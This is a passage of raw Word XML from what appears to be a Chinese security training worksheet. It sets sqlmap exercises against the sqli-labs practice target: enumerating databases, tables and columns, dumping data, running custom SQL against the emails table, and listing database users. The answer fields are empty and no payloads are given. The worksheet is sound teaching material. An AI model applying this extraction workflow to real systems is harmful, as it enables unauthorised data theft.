          <w:p w14:paraId="059C34B5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34B6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34B7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34B8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C34BA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C34BB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc7527"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>获取数据库名、数据库表、数据库字段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34BD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34BC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34BF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34BE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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获取数据库名、数据库表、数据库字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34C1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34C0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34C3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34C2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取数据库名、数据库表、数据库字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34C5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34C4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34CA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34C6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C34C7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取当前数据库名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C34C8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取当前数据库表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C34C9" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取当前数据库字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34CC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34CB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34D3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34CD" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34CE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34CF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34D0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34D1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34D2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C34D4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C34D5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc16871"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据库中的数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34D7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34D6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34D9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34D8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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获取数据库中的数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34DB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34DA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34DD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34DC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取数据库中的数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34DF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34DE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34E2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34E0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C34E1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> --dump</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据库中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表的数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34E4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34E3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34EB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34E5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34E6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34E7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34E8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34E9" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34EA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C34EC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C34ED" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C34EE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc3296"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行自定义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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34F0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34EF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34F2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34F1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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</w:rPr>
              <w:t>运行自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>语句</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34F4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34F3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34F6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34F5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>运行自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>语句</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34F8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34F7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34FB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34F9" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C34FA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>运行自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>语句，查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>数据库中的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>emails</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>表的数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C34FD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C34FC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3504" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C34FE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C34FF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3500" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3501" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3502" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3503" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3505" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3506" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc25915"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据库所有用户</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3508" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3507" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C350A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3509" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C350C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C350B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C350E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C350D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取数据库所有用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3510" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C350F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3513" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3511" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
